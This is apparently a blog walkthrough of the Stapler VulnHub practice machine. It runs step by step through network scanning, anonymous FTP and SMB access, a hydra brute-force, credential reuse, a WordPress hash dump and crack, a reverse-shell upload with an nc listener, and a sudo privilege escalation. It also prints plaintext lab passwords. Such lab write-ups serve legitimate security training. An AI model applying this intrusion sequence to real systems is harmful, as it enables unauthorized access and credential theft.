Stapler: 1 vulnhub walkthrough

5 min readNov 16, 2021


this is vulnerable box and now we enumerate this box step by step

first download this box on vulnhub using this link and deploy this box your local virtual box machine

scan with nmap and confirm your box ip address

important : my pc ip change so don’t confuse

$ nmap -sn is stapler machine ip so let’s enumerate ip address

simple port scaning with nmap

$ nmap -v -p-

here we see many services running on stapler box let’s first enumerate port 80 and check what is port 80

we found some error on port 80 don’t worry let’s do script and default scan with nmap

$ sudo nmap -sC -sV -sT -sU -A -p 20,21,22,53,80,123,137,138,139,666,3306,12380

let’s check ftp service with anonymous username

$ ftp

see content on note file using cat command

$ cat note

open note file and see content on note file it’s look like user: Elly and user: john and a message

let’s enumerate port 139 for smb and check the data on smb service

$ smbclient -L

we sucessfully list smb data without any user and password now what data available on kathy directory and tmp directory

$ smbclient //

we sucessfully login anonymously with kathy smb now we get all data on kathy user share directory we try to upload a file on kathy directory but we don’t have any kind of permission for put a file or make a directory or files let’s check kathy share data

now we use enum4linux command and enumerate

$ enum4linux -a

we found some user names

using username let’s create dictionary

let’s adjust username using cut command

$ cat userall.txt |cut -d " " -f 3
$ cat myuser.txt |cut -d '\' -f 2

let’s try this user on ftp

$ hydra -L userlist.txt -P userlist.txt

we found a user and password let’s login with user and password

let’s try ftp password on ssh service

user      : fin
password : SHayslett

we are login in ssh let’s enumerate

we found mysql password on wp-config.php file

let’s try mysql

$ mysql -h -u root -p

we are sucessfully login in mysql

mysql> show databases;
MySQL [(none)]> use wordpress
MySQL [wordpress]> show tables;
MySQL [wordpress]> SELECT * FROM wp_users;

now we have hashes let’s crack this user hases using hashcat command

$ hashcat -O -m 400 -a 0 -o hash_output.txt hash.txt /usr/share/wordlists/rockyou.txt

we can use john for password cracking so let’s try with john

now use john

now we trying to get www data shell so we have a directory which have 777 permission

$ find / -perm 777 -type d 2>/dev/null

now upload our reverse shell on uploads directory using wget command

let’s start listner nc on your hand and call this shell

blogblog directory have a wordpress site but we want to execute our shell so execute now

wow now we got shell now enumerate www data user

first covert this shell to interactive shell using this link

privelege escalation

let’s enumerate www_data user

we found some usefull information on user bash_history file using find command

$ find -name .bash_history
$ cat ./JKanode/.bash_history

now try this id password with peter on ssh

username : peter
password : JZQuyIN5
$ ssh peter@

this is not bash shell so let’s take bash shell

red% /bin/bash

now using sudo -l we found user peter run all command using sudo

$ sudo -l

now let’s find flag

wow we got flag

happy hacking |:)

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